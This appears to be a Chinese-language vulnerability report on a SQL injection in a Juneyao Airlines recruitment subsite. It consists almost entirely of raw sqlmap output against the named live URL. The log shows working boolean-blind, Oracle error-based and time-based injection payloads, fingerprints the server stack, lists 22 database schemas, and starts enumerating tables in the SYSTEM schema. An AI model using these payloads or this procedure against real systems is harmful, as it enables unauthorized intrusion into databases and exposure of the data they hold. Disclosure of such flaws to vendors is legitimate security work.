吉祥航空某分站sql注入注入点:http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=2
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)||CHR(113)||(SELECT
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
---
[10:04:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:04:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names
[10:04:50] [INFO] fetching database (schema) names
[10:04:50] [INFO] the SQL query used returns 22 entries
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)|
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_US
---
[10:04:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:04:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
[10:04:50] [INFO] fetching database (schema) names
[10:04:50] [INFO] the SQL query used returns 22 entries
available databases [22]:
[*] APEX_030200
[*] APPQOSSYS
[*] COMPLAIN
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] FMS
[*] IOFFICE
[*] KQ
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[10:04:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (h
[10:04:50] [INFO] fetched data logged to text files under 'D:\360?~1\SQLMAP~1.4\Bin\output\zhaopin.
[*] shutting down at 10:04:50
[root@Hacker~]# Sqlmap Sqlmap sqlmap -u http://zhaopin.juneyaoair.com:8081/Recurit/ANN.aspx?PK_ANN=
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal
[*] starting at 10:09:58
[10:09:58] [INFO] resuming back-end DBMS 'oracle'
[10:09:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: PK_ANN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PK_ANN=2' AND 1929=1929 AND 'rEJy'='rEJy
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: PK_ANN=2' AND 9075=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(116)||CHR(110)||CHR(115)|
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: PK_ANN=2' AND 4138=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_US
---
[10:09:58] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[10:09:58] [INFO] fetching tables for database: 'SYSTEM'
sqlmap got a 302 redirect to 'http://zhaopin.juneyaoair.com:8081/Error.aspx'. Do you want to follow
[10:10:01] [INFO] the SQL query used returns 161 entries